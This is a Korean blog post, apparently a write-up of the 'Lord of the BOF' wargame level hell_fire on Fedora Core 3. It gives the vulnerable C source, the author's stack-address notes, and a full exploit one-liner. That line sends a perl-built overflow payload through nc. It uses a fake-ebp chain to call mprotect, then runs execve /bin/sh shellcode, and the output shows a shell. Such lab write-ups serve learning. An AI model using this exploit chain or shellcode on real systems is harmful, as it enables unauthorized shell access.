int $0x80

dark_eyes -> hell_fire 본문

워게임/Lord Of the BOF

dark_eyes -> hell_fire

cd80 cd80 2013.10.10 21:48

 

[dark_eyes@Fedora_1stFloor ~]$ cat hell_fire.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - hell_fire
 - Remote BOF on Fedora Core 3
 - hint : another fake ebp or got overwriting
 - port : TCP 7777
*/

#include <stdio.h>

int main()
{
 char buffer[256];
 char saved_sfp[4];
 char temp[1024];
 
 printf("hell_fire : What's this smell?\n");
 printf("you : ");
 fflush(stdout);

 // give me a food
 fgets(temp, 1024, stdin);
  
 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 strcpy(buffer, temp);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

 printf("%s\n", buffer);

소스입니다

fgets를 사용하기때문에 stdin으로 fake ebp해 mprotect로 rwx권한을 줘 쉘코드를 실행했습니다

 

[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "A"x268, "\x38\x86\x04\x08", "B"x88, "\xf0\xe1\xff\xf6", "\x38\x86\x04\x08", "A"x132, "\x70\x46\x71\x00", "\x58\xe2\xff\xf6", "\x00\xe0\xff\xf6", "\x00\x08\x00\x00", "\x07\x00\x00\x00", "\x90"x300, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"';cat)|nc localhost 7777
hell_fire : What's this smell?
you :

my-pass
euid = 503
sign me up

 

아래는 풀면서 노트한 내용입니다

 

stdin+500으로 fake ebp

stdin = 0xf6ffe000

stdin+500 mprotect (0x714670)
stdin+504 0xf6ffe258
stdin+508 &stdin  (0xf6ffe000)
stdin+512 len  (0x00000800)
stdin+516 prot  (0x00000007)

stdin+600(0xf6ffe258) nop+shellcode

leaveret 0x8048638

mprotect(&stdin, 2048, 7);
 

 

신고

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10
0 Comments
댓글쓰기 폼